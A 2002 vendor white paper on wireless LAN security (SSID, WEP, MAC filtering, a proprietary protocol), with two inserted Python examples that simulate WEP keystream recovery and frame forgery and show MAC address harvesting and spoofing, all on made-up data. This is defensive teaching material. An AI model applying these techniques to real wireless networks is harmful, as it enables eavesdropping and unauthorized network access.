Wireless LAN Security

March 25, 2002

The rising concern over security in wireless LAN installations has led Psion Teklogix to examine its own WLAN systems for their current strengths and weaknesses, and to plan for stronger security in the future. Recent reports of practical attacks on 802.11 systems have left potential customers and their IT groups wary of deploying 802.11 for fear of exposing their networks and confidential information. This report looks at the types of attack that are possible, what a WLAN can expose, and what can be done to secure a WLAN system.

Types of Attacks
Before examining the security measures, it is useful to consider what can be exposed through a WLAN access point. Any LAN is vulnerable to two types of attack: an active attack, in which the intruder gains access to the LAN and can inject, alter or destroy data, and a passive attack, in which the intruder can only eavesdrop on the data being transmitted over the LAN. Wireless LANs are more exposed to both, because the attacker needs no physical connection to the premises: radio coverage commonly extends beyond the walls of the building.

Access Point Functionality
An access point's function is to bridge data between the wired LAN and the WLAN. In the simplest possible design, every frame on the wired enterprise LAN would be repeated over the radio frequency (RF) link. Most modern LANs, however, are more sophisticated and use network switches to reduce traffic on the wired LAN. A switch forwards a frame only if it is destined for a node on the far side, which reduces load and, importantly, leaves less data exposed to any connected device. Access points are usually attached to the LAN through a switch, so there is little data for the access point to bridge. Even when the access point is attached to a shared (hub) segment rather than a switch port, it behaves much like a switch itself, forwarding only the traffic destined for the wireless side. Advanced access points keep bridging tables and know which wireless nodes are associated with them (that is, talking directly to them), and bridge only the data destined for those nodes. The result is that the only data exposed to RF eavesdroppers is the traffic passing between the mobile devices and the network hosts. One caveat: broadcast and multicast frames (ARP requests, for example) are flooded to every switch port, including the access point's, so a small amount of wired-side traffic always reaches the air.

The access point therefore limits what a WLAN eavesdropper can see, but it leaves the WLAN open to active attacks unless other measures are taken. Advanced access points have several built-in features that make unauthorized access to the WLAN harder.

Service Set Identifier (SSID)
The Service Set Identifier was designed to let wireless networks be managed and organized by keeping wireless nodes talking to the right system: several RF networks can operate in the same physical area without clients joining the wrong one. It was not designed as a security feature, but by restricting clients to a named network it provides a first level of control if the SSID is known only to those authorized to use the WLAN.

For a mobile client to do more than eavesdrop, it must first 'associate' with a WLAN access point. The access point grants the association if the client's SSID matches its own. The SSID is a parameter that must be configured on both the access point and the client, and it provides a first, minimal line of defence against intruders. It is minimal because access points normally broadcast the SSID in the clear in their beacon frames, and even where that broadcast is suppressed the SSID still travels unencrypted in probe and association exchanges, so anyone with a wireless sniffer can learn it. It should nevertheless be changed from the vendor default and enabled, so that casual or accidental connections are kept off the WLAN.

Wired Equivalent Privacy (WEP)
WEP is intended to protect the network by encrypting the data transmitted over the WLAN. WEP uses a well-known stream cipher, RC4. The algorithm itself is public; the security is meant to rest on a key that is shared between the access points in the WLAN system and the mobile nodes and kept secret from everyone else. Radio vendors offer two key lengths, 40-bit and 104-bit, usually marketed as 64-bit and 128-bit because each key is combined with a 24-bit per-packet initialization vector (IV) that is sent in the clear in front of every encrypted frame. It was originally thought that 128-bit WEP would be virtually impossible to break because of the large number of possible keys. Researchers have since shown that WEP of either key length can be broken without trying each key in turn, so the system is not secure: the weakness is in how WEP uses RC4, not in the key length. The published methods rest on gathering enough packets off the air by eavesdropping. A fraction of IVs ('weak IVs') leak information about individual key bytes, and the 24-bit IV space is small enough that a busy access point reuses IVs within a day, which lets an eavesdropper recover keystream and read or alter frames without ever learning the key.

The WLAN industry has recognized that WEP is weaker than once thought and is developing a successor, referred to at the time of writing as WEP2, using AES (the Advanced Encryption Standard) to make recovering the key far more difficult. Until that arrives it is still worth enabling WEP, since it raises the cost of an attack above that of an open network, but it should be treated as a deterrent rather than as real protection: rotate the keys frequently (a WEP key is only as safe as the volume of traffic sent under it), and never let WEP be the only control.
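To make the keystream-reuse weakness concrete, here is an added example that is not part of the original article or of any Psion Teklogix product. It models WEP encapsulation (a 24-bit IV in the clear, RC4 seeded with IV || key, the CRC-32 integrity check value appended to the payload) with a constructed key, constructed payloads and a deliberately repeated IV. A passive eavesdropper who knows one frame's plaintext recovers the keystream for that IV and reads a second frame sent under it; an active attacker flips bits in a frame and repairs the CRC without the key, because CRC-32 is linear. The 802.2 LLC/SNAP header used as known plaintext is the real one that precedes IPv4 on 802.11; the key, IV and messages are made up.

```python
"""Toy WEP: RC4(IV||key) XOR (payload || CRC32), IV sent in the clear.
Added example; key, IV and payloads below are constructed, not captured."""
import struct
import zlib


def rc4(key, length):
    """Return `length` bytes of RC4 keystream for `key` (KSA, then PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def crc32(data):
    """WEP's ICV: CRC-32 of the payload, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(key, iv, payload):
    """Frame body as WEP builds it: IV (3 bytes, clear) || RC4(IV||key) XOR (payload || ICV)."""
    body = payload + crc32(payload)
    return iv + xor(rc4(iv + key, len(body)), body)


def wep_decrypt(key, frame):
    """Return the payload, or None if the ICV does not verify."""
    iv, body = frame[:3], frame[3:]
    plain = xor(rc4(iv + key, len(body)), body)
    payload, icv = plain[:-4], plain[-4:]
    return payload if crc32(payload) == icv else None


# 802.2 LLC/SNAP header that begins every IPv4 payload on 802.11: predictable plaintext.
SNAP_IPV4 = bytes.fromhex("aaaa030000000800")


def find_iv_reuse(frames):
    """Group captured frames by IV; any IV seen twice means a shared keystream."""
    by_iv = {}
    for f in frames:
        by_iv.setdefault(f[:3], []).append(f)
    return {iv: fs for iv, fs in by_iv.items() if len(fs) > 1}


def recover_keystream(frame, known_plaintext):
    """Passive attack: ciphertext XOR predicted plaintext = keystream for that IV."""
    return xor(frame[3:], known_plaintext)


def flip_bits(frame, offset, delta):
    """Active attack: XOR `delta` into the payload at `offset` without the key.
    CRC-32 is affine, so crc(p ^ d) == crc(p) ^ crc(d) ^ crc(zeros); the ICV
    correction is XORed into the ciphertext alongside the payload change."""
    body = frame[3:]
    n = len(body) - 4
    d = bytes(offset) + delta + bytes(n - offset - len(delta))
    icv_fix = xor(crc32(d), crc32(bytes(n)))
    return frame[:3] + xor(body, d + icv_fix)


def demo():
    key = b"\x0a\x1b\x2c\x3d\x4e"                 # constructed 40-bit WEP key
    iv = b"\x12\x34\x56"                           # IV the station happens to reuse
    msg_a = SNAP_IPV4 + b"ping request 0001"       # traffic the attacker can predict or provoke
    msg_b = SNAP_IPV4 + b"SKU 4711 QTY 17"         # the frame the attacker wants to read/alter
    frame_a = wep_encrypt(key, iv, msg_a)
    frame_b = wep_encrypt(key, iv, msg_b)
    frame_c = wep_encrypt(key, b"\x65\x43\x21", msg_b)   # a different IV: no reuse with the others

    reused = find_iv_reuse([frame_a, frame_c, frame_b])
    keystream = recover_keystream(frame_a, msg_a + crc32(msg_a))
    recovered = xor(frame_b[3:], keystream)[:len(msg_b)]

    forged = flip_bits(frame_b, msg_b.index(b"17"), xor(b"17", b"99"))
    return {
        "iv_reused": list(reused),
        "recovered": recovered,                    # plaintext of frame_b, key never learned
        "forged": wep_decrypt(key, forged),        # access point still accepts the altered frame
    }


if __name__ == "__main__":
    print(demo())
```

The 24-bit IV space holds only 16,777,216 values, so on a busy access point the collision in `demo()` happens naturally rather than by accident, and a station that restarts its IV counter at zero on every power cycle hands the attacker the same keystream again immediately. The bit-flip shows why WEP's CRC-32 is not an integrity check against an adversary and why the article's distinction between passive and active attacks matters: the same weakness enables both.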

MAC Level Authentication
An effective way to prevent unwanted associations is Medium Access Control (MAC) address authentication: the access point grants an association only to a mobile client whose MAC address it already knows. Advanced access points let administrators maintain an internal table of the MAC addresses of all clients that should have access to the WLAN, closing the system to known mobile nodes. Two caveats apply. MAC addresses travel unencrypted in the header of every 802.11 frame, whether or not WEP is enabled, so an eavesdropper can harvest the list of permitted addresses and reprogram a client card to use one of them; MAC filtering keeps out the casual intruder, not a determined one. The table must also be kept current at every access point (or pushed from a central management tool) as devices are added, replaced or retired, and a lost or stolen unit must be removed from it promptly.
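The SSID and MAC address caveats above both come down to what an 802.11 frame header carries in the clear. The following added example, which is not part of the original article or of any Psion Teklogix product, is a minimal parser for the fixed part of the 802.11 MAC header and the beacon body. It builds a constructed beacon and a constructed WEP-protected data frame (no trailing FCS, no QoS or four-address variants), reads the SSID and the sender's MAC address off them without any key, and then shows a toy MAC allow-list admitting a frame sent under the harvested address. All addresses, the SSID and the ciphertext bytes are made up.

```python
"""Minimal 802.11 header/beacon parser plus a toy MAC allow-list.
Added example; every address and payload below is constructed."""
import struct

BROADCAST = b"\xff" * 6


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def parse_header(frame):
    """Decode frame control and the three address fields (bytes 4..21).
    Nothing in this header is ever encrypted, even when the Protected bit is set."""
    fc0, fc1 = frame[0], frame[1]
    return {
        "type": (fc0 >> 2) & 0x3,        # 0 = management, 1 = control, 2 = data
        "subtype": fc0 >> 4,
        "to_ds": bool(fc1 & 0x01),
        "protected": bool(fc1 & 0x40),   # the "WEP" bit: body encrypted, header not
        "addr1": mac_str(frame[4:10]),
        "addr2": mac_str(frame[10:16]),
        "addr3": mac_str(frame[16:22]),
        "body": frame[24:],              # after the 2-byte sequence control field
    }


def beacon_ssid(frame):
    """Walk the information elements after the 12 fixed beacon bytes; element ID 0 is the SSID.
    Returns None when the access point suppresses it (zero-length element)."""
    hdr = parse_header(frame)
    if hdr["type"] != 0 or hdr["subtype"] != 8:
        raise ValueError("not a beacon frame")
    ies = hdr["body"][12:]               # timestamp(8) + beacon interval(2) + capability(2)
    while len(ies) >= 2:
        ie_id, ie_len = ies[0], ies[1]
        if ie_id == 0:
            return ies[2:2 + ie_len].decode("ascii", "replace") or None
        ies = ies[2 + ie_len:]
    return None


def source_mac(frame):
    """For a station-to-AP frame (ToDS=1, FromDS=0) the source address is addr2."""
    return parse_header(frame)["addr2"]


def ap_accepts(frame, allow_list):
    """Toy MAC-level authentication as described in the text: admit only known senders."""
    return source_mac(frame) in allow_list


def build_beacon(bssid, ssid):
    hdr = b"\x80\x00" + b"\x00\x00" + BROADCAST + bssid + bssid + b"\x00\x00"
    fixed = bytes(8) + struct.pack("<HH", 100, 0x0011)   # interval 100 TU; capability ESS + Privacy
    return hdr + fixed + b"\x00" + bytes([len(ssid)]) + ssid


def build_wep_data(bssid, sa, da, iv, ciphertext):
    """Data frame with ToDS=1 and Protected=1: header and IV in clear, body encrypted."""
    hdr = b"\x08\x41" + b"\x00\x00" + bssid + sa + da + b"\x00\x00"
    return hdr + iv + b"\x00" + ciphertext   # IV(3) + key id(1) + RC4 output


def demo():
    bssid = bytes.fromhex("00aabbccdd01")      # constructed access point address
    good = bytes.fromhex("00112233ff01")       # an authorized mobile computer
    rogue = bytes.fromhex("deadbeef0001")      # the attacker's own card
    allow = {mac_str(good)}

    beacon = build_beacon(bssid, b"WAREHOUSE")
    captured = build_wep_data(bssid, good, bssid, b"\x01\x02\x03", b"\x9a\x3c\x51")

    # The eavesdropper reads the SSID and an authorized MAC straight off the air...
    ssid = beacon_ssid(beacon)
    harvested = source_mac(captured)
    # ...then transmits from the rogue card, first honestly, then under the harvested address.
    honest = build_wep_data(bssid, rogue, bssid, b"\x01\x02\x04", b"\x00")
    spoofed = build_wep_data(bssid, bytes.fromhex(harvested.replace(":", "")),
                             bssid, b"\x01\x02\x04", b"\x00")
    return {
        "ssid": ssid,
        "harvested": harvested,
        "protected": parse_header(captured)["protected"],
        "honest_accepted": ap_accepts(honest, allow),
        "spoofed_accepted": ap_accepts(spoofed, allow),
    }


if __name__ == "__main__":
    print(demo())
```

Suppressing the SSID in beacons only changes where it is read from (probe responses and association requests carry it in the clear too), and the Protected bit covers the frame body alone, so a filtering access point has no way to tell the harvested address from the real one. This is why the article's recommendation is to layer SSID, WEP and MAC filtering rather than to rely on any one of them.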

Psion Teklogix 802.IQ System
Psion Teklogix has engineered an 802.11 system that improves performance for transaction-based environments over TCP/IP: on the WLAN, TCP/IP is replaced by the 802.IQ protocol. The published methods of breaking WEP depend on predicting part of the plaintext of the radio packets, and they generally assume TCP/IP traffic. The protocol filtering capabilities of an access point can keep every protocol other than 802.IQ off the WLAN, effectively limiting the system to PTX mobile computers. Because the structure of 802.IQ packets is not published, data that is decrypted remains PTX proprietary. Under the 802.IQ architecture, data on the wireless link passes only between the wireless network controller and the mobile node, which greatly reduces the amount of data exposed to eavesdropping and limits what an active intrusion can reach. Eavesdropping on such things as SKU numbers and quantities, taken out of context, yields little of value to an attacker. Two cautions apply. The leading bytes of a frame are predictable for any protocol carried behind an 802.2 LLC/SNAP header (it begins 0xAA 0xAA 0x03 whatever rides above it), so an unpublished higher-layer protocol does not by itself defeat known-plaintext attacks on WEP. And a proprietary format is obscurity rather than cryptography: it should be layered on top of the other measures, not substituted for them.

Summary
All of the above methods operate independently; they can be used in combination or all together to build more security into the wireless LAN, and all are currently supported by Psion Teklogix wireless systems. As new security methods are developed and standardized, Psion Teklogix will evaluate and adopt any that improve the security of its own WLAN system. One example is the move to WEP2, to make the encryption harder to break. A completely new security standard for wireless LANs, 802.11i, is in preparation and will introduce a new protocol for wireless security; Psion Teklogix is monitoring both closely. Until they arrive, the practical approach is to treat the WLAN as an untrusted network: combine the measures above, keep the access points on their own segment behind a firewall, and rely on end-to-end protection (a VPN or application-level encryption) for anything sensitive. New and emerging standards will be very important in an industry where interoperability and security are two topics that drive the development of new products.

Richard Harada, Psion Teklogix
